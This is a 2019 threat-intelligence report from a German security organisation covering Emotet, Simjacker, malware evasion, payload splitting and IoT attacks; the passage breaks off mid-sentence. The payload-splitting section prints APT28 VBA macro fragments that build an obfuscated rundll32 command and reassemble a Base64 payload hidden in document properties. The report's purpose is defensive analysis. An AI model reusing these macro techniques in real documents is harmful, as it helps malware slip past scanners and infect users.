Volume 2, Issue 37

Classification: TLP Green

Effective: Tuesday 17th September, 2019
Version: 1.0

Author
TI Team
security-analysts@dcso.de
PGP Fingerprint: 2868 EF2B 34FB 0AD8 0C2D 45D2 ED20 E9B0 A0B2 C6A8

DCSO Deutsche Cyber-Sicherheitsorganisation GmbH

EUREF Campus 22, 10829 Berlin, Germany
 Volume 2, Issue 37 TLP Green

Contents
1 Issues in Brief .............................................................................................. 2
1.1 Mozilla Moves to Support DNS-over-HTTPS by Default in Firefox ............. 2
1.2 “Simjacker” SIM Card Vulnerability Actively Exploited to Spy on Mobile
Users ............................................................................................................... 2
1.3 Emotet Malspam Resumes ........................................................................ 3
1.4 NSO Group’s UN Rights Abuses Guidelines Pledge Met with Skepticism ... 4
2 From Malware to Aroundware: Emerging Obfuscation Trends in Malware
Delivery and C2 Phases .................................................................................. 5
2.1 Endpoint Protection Evasion Techniques .................................................. 5
2.2 C2 Obscuration Techniques ....................................................................... 7
2.3 DCSO Conclusions and Recommendations ................................................ 8
3 March Separately, Strike Together: Splitting Malware to Evade Detection .. 9
3.1 PlugX ......................................................................................................... 9
3.2 Microsoft OLE Storage............................................................................... 9
3.3 Microsoft Word .docx.............................................................................. 11
3.4 DCSO Recommendations......................................................................... 11
4 The IoT Threat Landscape Revisited ............................................................13
4.1 The Rising Tide of IoT Device Attacks ...................................................... 13
4.2 The Current Threat Landscape ................................................................ 14
4.3 DCSO Conclusions and Recommendations .............................................. 17

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 1
 Volume 2, Issue 37 TLP Green

1 Issues in Brief
1.1 Mozilla Moves to Support DNS-over-HTTPS by Default in Firefox
Mozilla has announced that it plans to roll out DNS-over-HTTPS (DoH) by default within its
Firefox browser for a small group of U.S. users by the end of September,1 with Google
announcing days later that it plans to support optional DoH in its upcoming Chrome 78
browser.2 The principal rationale for the introduction of this protocol is privacy; it encrypts
both DNS requests and responses by obfuscating them within high-volume HTTPS traffic,
making them difficult to detect by internet service providers (ISPs), traffic filters, or any
other commercial or malicious third party that might attempt to intercept and sniff user
traffic.3 Additionally, it would allow customers to reroute to their own DoH-supported
servers and thereby limit the monetization opportunities ISPs derive from the capture of
DNS traffic data.4

Mozilla’s support of DoH by default in its browser has drawn criticism from various parties,
with points raised including the potential use of DoH by attackers in malware targeting, a
shift from highly distributed DNS resolvers to overreliance on a few large DoH providers,5
and, more specifically to enterprise, the potential circumvention of most content or security
controls following DoH introduction, which are often based on DNS.6 A comprehensive
analysis of the topic will be provided in the upcoming ad-hoc report “DNS-over-HTTPS
Support in Browsers: Enterprise Risks and Remediation.”

1.2 “Simjacker” SIM Card Vulnerability Actively Exploited to Spy on Mobile

Users
Researchers at AdaptiveMobile Security have uncovered an actively exploited vulnerability in
mobile SIM cards that allows spying on users by sending them an SMS message. 7 The
vulnerability, named “Simjacker,“ abuses a flaw in the legacy software of the SIM Toolkit
technology on SIM cards by sending a data message SMS that allows the installation of

1
Catalin Cimpanu, “Mozilla to gradually enable DNS-over-HTTPS for Firefox US users later this month,” ZDNet,
September 7, 2019, https://www.zdnet.com/article/mozilla-to-gradually-enable-dns-over-https-for-firefox-us-
users-later-this-month/.
2
Tom Spring, “Google Announces DNS over HTTPS General Availability,” ThreatPost, June 26, 2019,
https://threatpost.com/google-announces-dns-over-https-general-availability/146057/.
3
Selena Deckelmann, “DNS-over-HTTPS (DoH) Update-Detecting Managed Networks and User Choice,” Mozilla,
July 31, 2019, https://blog.mozilla.org/futurereleases/2019/07/31/dns-over-https-doh-update-detecting-
managed-networks-and-user-choice/.
4
John Dunn, “DNS over HTTPS is coming whether ISPs and governments like it or not,” Sophos, April 24, 2019,
https://nakedsecurity.sophos.com/2019/04/24/dns-over-https-is-coming-whether-isps-and-governments-like-
it-or-not/.
5
J. Livingood et al, “Centralized DNS over HTTPS (DoH) Implementation Issues and Risks,” IETF (Internet Draft),
March 24, 2019, https://tools.ietf.org/id/draft-livingood-doh-implementation-risks-issues-
03.html#rfc.section.8.
6
Catalin Cimpanu, “Mozilla: No plans to enable DNS-over-HTTPS by default in the UK,” ZDNet, July 6, 2019,
https://www.zdnet.com/article/mozilla-no-plans-to-enable-dns-over-https-by-default-in-the-uk/.
7
Cathal McDaid, "Simjacker – Next Generation Spying Over Mobile," Adaptive Mobile Security, September 12,
2019, https://www.adaptivemobile.com/blog/simjacker-next-generation-spying-over-mobile.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 2
 Volume 2, Issue 37 TLP Green

spyware without the user’s knowledge. This flaw allows remote attackers to retrieve
targeted devices' locations, send SMS messages on behalf of victims, spread malware by
forcing phone browsers to open malicious pages, and spy on victims’ surroundings.
Additionally, as it targets the SIM cards, the attack is successful independently of handset
types and their respective OS. Researchers believe that this vulnerability has been exploited
for at least the last two years and are “quite confident” that this exploit was developed by a
specific private company that works with governments to monitor individuals.

A series of debates on Twitter8 concerning “the uncovering of the exploit” has drawn
attention to the fact that German researcher Karsten Nohl may have first uncovered the
vulnerability in 2013,9 while others have cited the work of security researcher Bogdan Alecu
from 2011.10

1.3 Emotet Malspam Resumes

Following an extended period of inactivity over the summer, multiple reports indicate that
Emotet malspam has resumed, following reports last month that the botnet’s C2
infrastructure had returned online.11 Researchers found that the malicious emails had been
sent from 3,362 different hijacked senders, targeting more than 65,000 unique email
addresses, with lure email templates found in multiple languages including English, German,
Polish, and Italian.12

Lure templates across multiple languages appear to broadly follow a similar pattern, typically
providing false invoices or documentation (often financial) either requesting that the
recipient check the message or otherwise claiming that a problem has occurred to entice
victims to open the attachment.13 Other researchers have identified additional elements of
the current campaign that are in line with previous Emotet outbreaks, including ESET

8
Daniel Cuthbert (@dcuthbert), "When an attack by Karsten Nohl from 6 years ago," Twitter, September 12,
2019, https://twitter.com/dcuthbert/status/1172138454865645568.
9
Bill Ray, "How I hacked SIM cards with a single text - and the networks DON'T CARE," The Register, September
23, 2013,
https://www.theregister.co.uk/2013/09/23/white_hat_sim_hacker_disillusioned_and_dismayed_by_operator
_response/.
10
Lucian Constantin, "Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages,"
PCWorld, December 19, 2011,
https://www.pcworld.com/article/246528/remote_sms_attack_can_force_mobile_phones_to_send_premium
rate_text_messages.html.
11
CERT-Bund (@certbund), "#Emotet ist zurück!" Twitter, August 23, 2019,
https://twitter.com/certbund/status/1164803474497761286.
12
Ionut Ilascu, "Emotet Revived with Large Spam Campaigns Around the World," Bleeping Computer,
September 16, 2019, https://www.bleepingcomputer.com/news/security/emotet-revived-with-large-spam-
campaigns-around-the-world/.
13
Ibid.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 3
 Volume 2, Issue 37 TLP Green

confirming that they have observed the current Emotet wave distributing TrickBot.14 IOC lists
have also been published by a number of researchers and vendors.15

1.4 NSO Group’s UN Rights Abuses Guidelines Pledge Met with Skepticism
Israeli-based NSO Group, a supplier of surveillance tools to governments and law
enforcement, announced last week that it would abide by U.N. guidelines to prevent rights
abuses after months of mounting criticism due to the use of their Pegasus software for
political surveillance of activists in Mexico, the United Arab Emirates, and Saudi Arabia.16
NSO Group also plans to evaluate its sales process and contractually oblige customers to
limit the use of its products to the prevention of serious crimes, and to ensure that the
products will not be used to violate human rights. NSO Group, however, declined to provide
details of previous acquisitions of their software, citing significant constraints on lawful
disclosure under the Israeli export license regime, and providing, in a previously published
letter, an independent legal opinion from the Israeli law firm Herzog, Fox & Neeman
confirming this.17

Human rights activists have countered that preventing human rights abuses requires both
transparency and independent oversight over the NSO Group, and both are absent from its
human rights policy.18 Transparency is next to impossible with the presence of significant
constraints on public disclosure, and the independent legal opinion provided was prepared
by Herzog Fox Neeman’s partner Daniel Reisner, who represents many Israeli cyber firms
and additionally a member of the ethics committee at NSO Group, potentially raising conflict
of interest concerns.19

14
ESET research (@ESETresearch), "#ESETresearch can confirm: #Emotet is back," Twitter, September 17, 2019,
https://twitter.com/ESETresearch/status/1173932076258734081.
15
Threat Intelligence Team, "Emotet is back: botnet springs back to life with new spam campaign,"
Malwarebytes Labs, September 16, 2019, https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-
botnet-springs-back-to-life-with-new-spam-campaign/.
16
Steven Scheer, "Cyber firm NSO vows to tackle human rights misuse," Reuters, September 10, 2019,
https://uk.reuters.com/article/us-cyber-rights-nso-idUKKCN1VV11S.
17
Novalpina Capital, "Response to Open Letter to Novalpina Capital on 15 April 2019," Citizen Lab, May 15,
2019, https://citizenlab.ca/wp-content/uploads/2019/05/Novalpina-reply-May-15.pdf.
18
Siena Anstis (@sienaanstis), "1/8 Transparency and independent oversight of NSO Group," Twitter,
September 10, 2019, https://twitter.com/sienaanstis/status/1171427825804443649?s=21.
19
Siena Anstis (@sienaanstis), "5/8 Novalpina conveniently failed to mention that the "independent" opinion,"
Twitter, September 10, 2019, https://twitter.com/sienaanstis/status/1171427831894528002.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 4
 Volume 2, Issue 37 TLP Green

2 From Malware to Aroundware: Emerging Obfuscation Trends in

Malware Delivery and C2 Phases
The malware threat posed to corporations has advanced in sophistication in recent years.
Although enterprise and end-user security solutions have also become more comprehensive
in response to mounting cybercriminal pressure, today’s malware developers have
demonstrated a willingness to innovate in unanticipated ways to circumvent advanced
malware detection methods.

The struggle to secure the modern cyber threat landscape revolves around finding scalable
responses to cybercriminals’ ingenuity. Adopting an anticipative mindset to stay one step
ahead of your adversaries requires a keen awareness of emerging defense circumvention
techniques. This article provides an account of some of the more surprising malware
obfuscation trends observed at the delivery and command and control phases of recent
malware campaigns.

2.1 Endpoint Protection Evasion Techniques

Leveraging File-Type Obscurity

Recent attack instances have exploited under-scrutinized file types to bypass antivirus and
secure email gateways. AV products have many signature-based methods to inspect
common malware file types such as VBA, but most obscure formats do not receive the same
level of scrutiny. A sophisticated malware campaign carried out by the North Korean
Kimsuky APT group this summer embedded a malicious Visual Basic Script (.vba) within a
more obscure Kodak FlashPix file format (.fpx) to significantly lower the rate at which the
malware was successfully detected by AV products. Prevailion researchers found that by
doing so, the attackers lowered the malware’s successful initial detection rate to 8/57 AV
products from the VBA’s initial detection rate of 23/57.20

Recent findings from cybersecurity researchers have also shown the risk posed by malicious
virtual disk email attachments.21 While email providers such as Gmail block emails
containing certain executable file types,22 many cloud solutions cannot mount VHD
containers, leaving their malicious contents free to bypass email filtering systems. Security
researcher Jan Poulsen found that, by combining VHD containers with a script exploiting the
Windows “diskpart” command-line utility, an attacker could automatically mount and
execute the malware inside, undetected, once downloaded.23

20
Danny Adamitis and Elizabeth Wharton, “Autumn Aperture Report,” Prevailion Blog, September 11, 2019,
http://blog.prevailion.com/2019/09/autumn-aperture-report.html.
21
Ionut Ilascu, “Virtual Disk Attachments Can Bypass Gmail and Chrome Security,” BleepingComputer,
September 11, 2019, https://www.bleepingcomputer.com/news/security/virtual-disk-attachments-can-bypass-
gmail-and-chrome-security/.
22
Google, “File Types Blocked in Gmail,” Gmail Help, accessed September 16, 2019,
https://support.google.com/mail/answer/6590?hl=en.
23
Ibid.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 5
 Volume 2, Issue 37 TLP Green

Exploiting Trusted Domains

Malware strains also increasingly host their components on trusted domains in order to
bypass secure email gateway protocols. Cofense researchers recently investigated malware
developers’ usage of trusted file hosting services such as SharePoint24 and Google Drive25 to
covertly deliver malicious payloads to their targets. By using legitimate services as initial
delivery mechanisms for secondary malicious URLs or files, threat actors can easily bypass
email-based detection techniques.

A Cofense report released this month also uncovered a credential-stealing email campaign
that directed users to an intermediary Azure Web Sites page hosting only a Captcha code,
leaving the SEG to mark it as safe.26 Upon solving the Captcha, the user is redirected to a
spoofed Microsoft login portal hosted on the company’s official infrastructure. While this
case does not feature an active malware component, it demonstrates how other trusted
online tools can also be incorporated into social engineering strategies to improve an
attacker’s chance of operational success.

“Zombie Phishing”

Zombie phishing refers to the practice of hijacking email accounts to send malware as a
response to an existing email thread.27 Because the response is part of a legitimate
conversation chain, the victim might be less likely to realize they’ve been targeted.
Furthermore, recent attack instances appear to use webmail-related words within
automatically generated infection URLs, further reducing the likelihood for SEGs to block the
malicious emails in question. With the resurging Emotet botnet employing similar means to
spread its malware,28 this unorthodox infection method should not be underestimated.

Fraudulent-But-Legitimate Digital Certificates

A recent investigation by cybersecurity firm ReversingLabs uncovered an instance in which a

cybercriminal impersonated a legitimate entity to purchase a legitimate digital certification,
which was subsequently used to spread malware via signed malicious files.29 Cybercriminals

24
Milo Salvia, “Phishing Emails Are Using SharePoint to Slip Past Symantec’s Gateway and Attack Banks,”
Cofense (blog), September 3, 2019, https://cofense.com/phishing-emails-using-sharepoint-slip-past-symantecs-
gateway-attack-banks/.
25
Tej Tulachan, “Trickbot Is Using Google Docs to Trick Proofpoint’s Gateway,” Cofense (blog), August 29, 2019,
https://cofense.com/trickbot-using-google-docs-trick-proofpoints-gateway/.
26
Fabio Rodrigues, “New Phishing Campaign Uses Captcha to Bypass Email Gateway,” Cofense (blog),
September 9, 2019, https://cofense.com/new-phishing-campaign-uses-captcha-bypass-email-gateway/.
27
Erika Mendoza, Anjali Patil, and Jay Yaneza, “Phishing Campaign Uses Hijacked Emails to Deliver URSNIF by
Replying to Ongoing Threads,” TrendLabs Security Intelligence (blog), October 9, 2018,
https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-
deliver-ursnif-by-replying-to-ongoing-threads/.
28
Marcus Hutchins (@MalwareTechBlog), “Emotet Is Back Spamming after Months of Inactivity. Currently
They’re Using Stolen Emails to Reply to Existing Email Threads with Malspam (Targeting DE).” Twitter,
September 16, 2019, https://twitter.com/malwaretechblog/status/1173517787597172741.
29
Tomislav Pericin, “Digital Certificates - Models for Trust and Targets for Misuse,” ReversingLabs (blog),
September 16, 2019, https://blog.reversinglabs.com/blog/digital-certificates-impersonated-executives-as-
certificate-identity-fronts.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 6
 Volume 2, Issue 37 TLP Green

can append the certification with a fraudulent scanning record with relative ease, providing
their digital certificates with a clean record before selling them on the black market to other
malware developers.

ReversingLabs found that one observed actor was issued an extended validation certificate,
which allows associated apps to “bypass Microsoft SmartScreen protection and allow signed
programs to execute with no warnings about the possible unsafe file origins.”30 Code-signing
certificates have come under greater scrutiny due to their increasing abuse in malware
campaigns,31 but nevertheless cannot be discounted entirely due the pivotal role they play in
trust-based software environments.

2.2 C2 Obscuration Techniques

DNS-over-HTTPS Services Exploitation

The Godlua malware discovered last July was “the first-ever malware strain seen using DNS-
over-HTTPS (DoH) to hide its DNS traffic,”32 effectively negating cybersecurity products that
rely on passive DNS monitoring. A recent, updated version of the .NET-based malware
PsiXBot uses Google’s new DoH service to route its queries to return C2 IP addresses, leaving
SSL/TLS MITM queries the only effective way to detect the malware’s communications.33 As
companies increasingly offer accessible DoH services to encrypt user traffic, it is likely that
this trend will become more prevalent in the near future.

Trusted Domains

Malware developers are also increasingly exploiting legitimate cloud service providers for
their C2 processes. The RogueRobin malware favored by the DarkHydrus APT group employs
a custom C2 channel exploiting Google Drive,34 using an API from the service to get job
commands.

Social media websites are also a relevant vector here, with the Russian Turla APT group
infamously using American pop singer Britney Spears’ Instagram posts to house encoded C2
server URLs in 2017.35 A new version of the Astaroth Trojan active in Brazil retrieves C2
configuration data from “within posts on Facebook or within the profile information of user

30
Ibid.
31
ENISA, “Valid Digital Certificates Code Signing Malware,” European Union Agency for Cybersecurity (blog),
June 30, 2018, https://www.enisa.europa.eu/publications/info-notes/valid-digital-certificates-code-signing-
malware.
32
Catalin Cimpanu, “First-Ever Malware Strain Spotted Abusing New DoH (DNS over HTTPS) Protocol,” ZDNet,
July 3, 2019, https://www.zdnet.com/article/first-ever-malware-strain-spotted-abusing-new-doh-dns-over-
https-protocol/.
33
Proofpoint Threat Insight Team, “PsiXBot Now Using Google DNS over HTTPS and Possible New Sexploitation
Module,” Proofpoint (blog), September 6, 2019, https://www.proofpoint.com/us/threat-insight/post/psixbot-
now-using-google-dns-over-https-and-possible-new-sexploitation-module.
34
Tara Seals, “RogueRobin Malware Uses Google Drive as C2 Channel,” Threatpost, January 23, 2019,
https://threatpost.com/roguerobin-google-drive-c2/141079/.
35
Catalin Cimpanu, “Russian State Hackers Use Britney Spears Instagram Posts to Control Malware,”
BleepingComputer, June 6, 2017, https://www.bleepingcomputer.com/news/security/russian-state-hackers-
use-britney-spears-instagram-posts-to-control-malware/.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 7
 Volume 2, Issue 37 TLP Green

accounts on YouTube,” allowing threat actors to bypass defenses that rely on URL-based
content filtering.36 This campaign also uses HTTPS POST to send its two-layered encrypted
information, bypassing further network security measures that cannot decrypt it.

2.3 DCSO Conclusions and Recommendations

Enterprise cybersecurity can be understood as a contest with minimum margins for error,
terms that favor attackers considerably. The conflict between cybercriminals and
cybersecurity professionals would be different in an ideal world where security operated in a
vacuum, but instead the majority of decisions that affect enterprise security are instead
made by uninitiated users. In spite of this fundamental complicating factor, best practices
have to maintain a balance between securing systems and preserving their general
operability. There is no comprehensive solution to addressing the cybercriminal threat other
than continual anticipation and evolution, and a whole-of-business level observation of basic
cyber hygiene practices.

Trends such as the rise of polymorphic malware have already necessitated the incorporation
of new threat detection techniques in everyday cybersecurity tools and solutions, and the
global uptick in aggressive cybercrime37 further illustrates the need for cybersecurity
professionals to anticipate, and maintain awareness of, unorthodox malware techniques on
the horizon to protect high-value targets. Although the instances investigated in this article
remain relatively obscure, they indicate potential development pathways for future malware
techniques. Understanding the unanticipated means employed by contemporary malware
campaigns to circumvent security perimeters and communicate with remote servers
undetected is one piece of a larger puzzle to improve the state of security in the private
sector.

DCSO recommendations are as follows:

 Implement and enable multifactor authentication across your organisation.

 Train users to pay special attention to scenarios where they are asked to log in and
supply credentials.
 Continually verify and audit trusted enterprise software.

36
Aaron Riley, “Astaroth Uses Facebook and YouTube within Infection Chain,” Cofense (blog), September 11,
2019, https://cofense.com/astaroth-uses-facebook-youtube-within-infection-chain/.
37
European Union Agency for Law Enforcement Cooperation, “Europol Crime Areas: Cybercrime,” Europol
(blog), 2018, https://www.europol.europa.eu/crime-areas-and-trends/crime-areas/cybercrime.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 8
 Volume 2, Issue 37 TLP Green

3 March Separately, Strike Together: Splitting Malware to Evade

Detection
In the never-ending arms race with the anti-virus industry, malware authors have invented a
multitude of techniques to evade detection. One of these techniques is splitting a large,
monolithic malware into two or more innocent looking pieces. This article illustrates this
technique with a few examples from APT attacks and discusses countermeasures.

3.1 PlugX
The most prominent example of the “march separately, strike together” paradigm is the
well-known PlugX triad. For a long time, PlugX malware has been shipped in three parts:

1. A benign program
2. A small loader DLL
3. The encrypted PlugX payload

Here is a typical example: The benign program belongs to Kaspersky Anti-Virus software.
Sample 902d771612edecc03757b289a6fe94cd18f2c88c0fc64f93f8ac449502e4ec52, known
as kav.exe, presents a valid digital signature. However, the trusted code loads a DLL named
ushata.dll in an insecure manner. The attacker exploits this vulnerability by providing their
own version of this file. Their loader DLL
(43047367c47e2ad3fc46a565530b991fba1baeccb0937fd846a4042c9dcc1db4) is only about
three kilobytes in size. Static analysis does not reveal much. The DLL allocates some memory,
loads the third file, and transfers control. The third file appears as a data file with an entropy
of 7.6 bits per byte
(2089591b41ca46802d2699075ca56b183a27b3a7080dbc9d42993357c0845efd).

So, all three files either are or appear to be unsuspicious. By exploiting a vulnerability in
trusted code and splitting the payload, the attacker very likely could evade static detection
methods.

The most promising strategy to detect the malware is behavioral analysis. Most notably, the
loading and executing of untrusted data from a trusted executable should trigger an alarm.

3.2 Microsoft OLE Storage

The same principle can also be applied to data containers that provide an inner structure. A
very common container format is Microsoft’s structured OLE storage that has been used for
software deployment (.msi) and the old-fashioned Microsoft Office documents (.doc, .xls).

The associated application (e.g., Microsoft Word) assumes the role of a trusted execution
environment. The attackers frequently rely on Word’s capability to execute VBA macros.
Theoretically, it should be possible to limit execution of macros to digitally signed and
therefore trusted code. But in an open, fast-paced, and business-friendly environment, code-
signing becomes a hindrance. The application’s user becomes the last line of defense and is
required to exercise common sense whenever a macro warning pops up.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 9
 Volume 2, Issue 37 TLP Green

Sample efb235776851502672dba5ef45d96cc65cb9ebba1b49949393a6a85b9c822f52 is a
Word document that was crafted by APT28. The macro is very short; the first half of the
code is a harmless Base64 decoding function. The only suspicious action is the slightly
obfuscated construction of a command line for later execution.

cmdLine = "C:\" + "###" + "Win" + "###" + "dow" + "###" + "s\Sy" + "###" + "ste" + "###" + "m32\" +
"run" + "###" + "dll" + "32" + "#" + ".exe " + """" + Path + """" + "###" + ",KlpSvc"

WordBasic.[Shell] Replace(cmdLine, "#", "")

There might be legitimate reasons to launch a helper application (e.g., a database or

calculator) from the Word document. The malicious payload, however, will be constructed at
runtime from fragments that are stored in various locations within the container’s structure:

'extract and decode encoded file

Subject = ActiveDocument.BuiltInDocumentProperties.Item("Subject")

Subject = Right(Subject, Len(Subject) - 50)

Company = ActiveDocument.BuiltInDocumentProperties.Item("Company")

Company = Right(Company, Len(Company) - 50)

Category = ActiveDocument.BuiltInDocumentProperties.Item("Category")

Category = Right(Category, Len(Category) - 50)

Hyperlink_base = ActiveDocument.BuiltInDocumentProperties.Item("Hyperlink base")

Hyperlink_base = Right(Hyperlink_base, Len(Hyperlink_base) - 50)

Comments = ActiveDocument.BuiltInDocumentProperties.Item("Comments")

Comments = Right(Comments, Len(Comments) - 50)

base64 = Subject + Company + Category + Hyperlink_base + Comments

bin = DecodeBase64(base64)

The view of a static analyzer may be restricted to the macro only; the contents of the various
properties will not be available for analysis. By splitting the payload, the attackers very likely
succeeded in bypassing security measures.

It should be noted that, in this particular case, detection by a signature would have been
very easy: The Base64 encoded executable header TVqQ is clearly visible in the file. When
needed, attackers could easily thwart detection by using a non-standard base64 alphabet or
even the simplest form of encryption.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 10
 Volume 2, Issue 37 TLP Green

3.3 Microsoft Word .docx

For many years, Microsoft Office switched from complex OLE storage to ZIP archives as a
container. In terms of signature-based detection, the compression layer obfuscates the true
contents of the file. In sample
a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797, APT28 used this
to their advantage.

The sample is a .docx Microsoft Word document. It shares the Base64 decoder function and
some comments with the sample discussed earlier. Again, the payload has been hidden in
document properties, which are stored in the docProps/app.xml stream of the container.
Microsoft Word now uses XML as underlying format. So, the attackers can conveniently
retrieve their payload with an XPATH query:

'extract and decode encoded file

xml = ActiveDocument.WordOpenXML

Set xmlParser = CreateObject("Msxml2.DOMDocument")

If Not xmlParser.LoadXML(xml) Then

Exit Sub

End If

Set currNode = xmlParser.DocumentElement

Set selected = currNode.SelectNodes("//HLinks" & "/vt:" & "vector" & "/vt:" & "variant" & "/vt:" &
"lpwstr")

If 2 > selected.Length Then

Exit Sub

End If

base64 = selected(1).Text

bin = DecodeBase64(base64)

Common static scanners would unpack the ZIP archive and scan each stream separately. The
scanner would likely flag each of the components as suspicious, but could easily miss the
true maliciousness of the combined action.

3.4 DCSO Recommendations

Common static scanners inspect files or streams one by one. An attacker can exploit this
behavior by dispersing a malicious payload across multiple files or streams.

DCSO recommendations are as follows:

 Complement simple file scanners with behavioral detection.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 11
 Volume 2, Issue 37 TLP Green

 Enable Windows command line process auditing.38

 Enhance logging capabilities with Sysmon39 or comparable products.
 Aggregate log information in a SIEM.
 The SIGMA rule repository40 provides many generic rules to detect behavioral
anomalies. SIGMA rules can be converted into proprietary query languages
supported by major SIEM vendors.

38
Justin Turner, "Command line process auditing," Microsoft, May 31, 2017, https://docs.microsoft.com/en-
us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing.
39
Mark Russinovich & Thomas Garnier, "Sysmon v10.41," Microsoft, September 16, 2019,
https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon.
40
Florian Roth (Neo23x0), "Sigma," GitHub, last accessed September 17, 2019,
https://github.com/Neo23x0/sigma.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 12
 Volume 2, Issue 37 TLP Green

4 The IoT Threat Landscape Revisited

The last couple of months brought about important new insights into the threat landscape of
IoT devices, both as the target of state-sponsored attacks and as a target for cybercriminals
who find them to be easily exploitable. Some analysts have concluded that the wave of
current attacks targeting these devices in large botnet campaigns is only the tip of the
iceberg. Indeed, a recent TrendMicro report on the matter concluded that there are
extensive discussions within certain cybercriminal forums focusing on IoT devices and ways
in which to exploit them. While various outlets and security companies have reported on the
increasing volume of attacks targeting IoT devices, it is the more sophisticated and persistent
campaigns that will likely cause concern, especially in the future.41

Most reporting on so-called IoT attacks have focused on a range of different devices, ranging
from routers to ordinary printers that were exposed to the internet. However, the overall
threat landscape is less clearly understood, and more insight would help prepare for
upcoming campaigns that exploit vulnerabilities and attempt to cause more harm than just
adding the device to a botnet in continuous campaigns.42 As a result, companies should
carefully consider their application and device tooling security with regards to these devices
and attempt to create segregated perimeters that are tightly controlled.

4.1 The Rising Tide of IoT Device Attacks

In the summer of 2018, the FBI and the Department of Homeland Security (DHS) released an
extensive risk advisory on the use and deployment of IoT devices that highlighted
foreseeable problems. For instance, IoT devices are entirely engineered for ease-of-use
applications and not primarily with a security-first mindset. This might open up the plug-and-
play devices to a range of different issues, such as easy-to-guess passwords, hardcoded
credentials, and security options that can only be adapted by IT professionals, if at all.

Additionally, the sheer number of devices that were connected to the internet during the
beginning of 2015, starting with the first Google and Amazon home assistants, created a
much larger attack surface than was previously thought possible. This large attack surface, in
combination with the often flawed security designs, has created a large, powerful source of
computing power and private data that is exploited en-masse. This became especially
apparent when the first IoT dedicated botnets arrived with the advent of Mirai and Hajime in
2016. Both botnets took over the targeted devices by simply brute forcing embedded or
hardcoded passwords, using a list of the most common administrator credentials. These
passwords were left in the device, and consumers either did not know how to change them
or were not even aware of their existence.

41
"IoT Attack Opportunities Seen in the Cybercrime Underground,” TrendMicro, September 10, 2019,
https://blog.trendmicro.com/trendlabs-security-intelligence/iot-attack-opportunities-seen-in-the-cybercrime-
underground/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-
MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29.
42
Brian Buntz, "A Year in Review: 12 IoT Security Considerations,” IoTWorldToday, August 15, 2019,
https://www.iotworldtoday.com/2019/08/15/a-year-in-review-12-iot-security-considerations/.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 13
 Volume 2, Issue 37 TLP Green

The Mirai botnet went on to become one of the largest threats of its kind and was used to
disrupt the internet connection throughout the East Coast with one of the biggest denial-of-
service attacks recorded in history. It was not only the ease with which the Mirai botnet
collected devices, but also the versatility of the malware which was the result of
collaborative development by several parties involved. The ultimate goal for the Mirai
botnet owners was crime-as-a-service offerings for a range of different actors.43

The year 2017 brought about a move towards the exploitation of well-known vulnerabilities
in HTTP control interfaces that affected a range of different devices (primarily IP-based
cameras) in order to use their computing power for cryptocurrency mining. One of the most
interesting was the Reaper IoT botnet, which affected huge numbers of IoT devices in
2017.44

In 2018, researchers discovered VPNFilter, which appeared to be a first in many ways. First,
the code overlap with BlackEnergy suggested a link to Russian actors intent on targeting
Ukraine. Second, the malware-infected routers and VPN devices focused on intercepting
communication from SCADA systems used in manufacturing and maintenance. Third, the
malware affected nearly every router model that was on the market which featured a
vulnerability at that point in time. The spread and capabilities of the malware prompted the
U.S. government to issue separate and dire warnings about its spread.45

In more recent news, the Russian group APT28 (also known as Fancy Bear) was exposed by
Microsoft for targeting and compromising IoT devices to gain access to a range of different
businesses. These devices included VoIP phones, office printers, and video decoders.
According to Microsoft’s statement and subsequent presentation at a conference, the
attackers managed to gain a foothold in the internal network of a corporation by first
targeting these IoT devices which were placed on the outer perimeter of the company
network for ease-of-use reasons. This presents a significant development in the importance
of IoT devices and their security, as the number of active and connected devices will only
grow in the coming years.46

4.2 The Current Threat Landscape

The current developments in the IoT threat landscape can be described as uneven. While the
cybercriminal underground appears to have led the charge until now, state actors are
increasingly turning towards the many possibilities that these vulnerable devices offer, from

43
"IoT Threat Landscape,” F-Secure, September 1, 2019, https://s3-eu-central-1.amazonaws.com/evermade-
fsecure-assets/wp-content/uploads/2019/04/01094545/IoT-Threat-Landscape.pdf.
44
Ibid.
45
Dan Goodin, "VPNFilter malware infecting 500,000 devices is worse than we thought,” June 6, 2019,
ArsTechnica, https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-
devices-is-worse-than-we-thought/.
46
Sergiu Gatlan, “Russian APT Abuses IoT Devices to Infiltrate Corporate Targets,” August 5, 2019,
BleepingComputer, https://www.bleepingcomputer.com/news/security/russian-apt-abuses-iot-devices-to-
infiltrate-corporate-targets/.

Deutsche Cyber-Sicherheitsorganisation GmbH

Tuesday 17th September, 2019 TI Team 14
 Volume 2, Issue 37 TLP Green

data streams that might contain private information to gaining access to company networks
and services connected with vulnerable devices.

The Cybercriminal Underground

The cybercriminal underground has long focused on vulnerabilities and exploits surrounding
the use of IoT networks; until 2019, this misuse has focused primarily on two methods. The
devices are being taken over either to generate cryptocurrency or to offer large botnets for
denial-of-service attacks, spamming campaigns, and click fraud schemes. In the first
instance, the infected device is part of a mining botnet and its computing power is stolen to
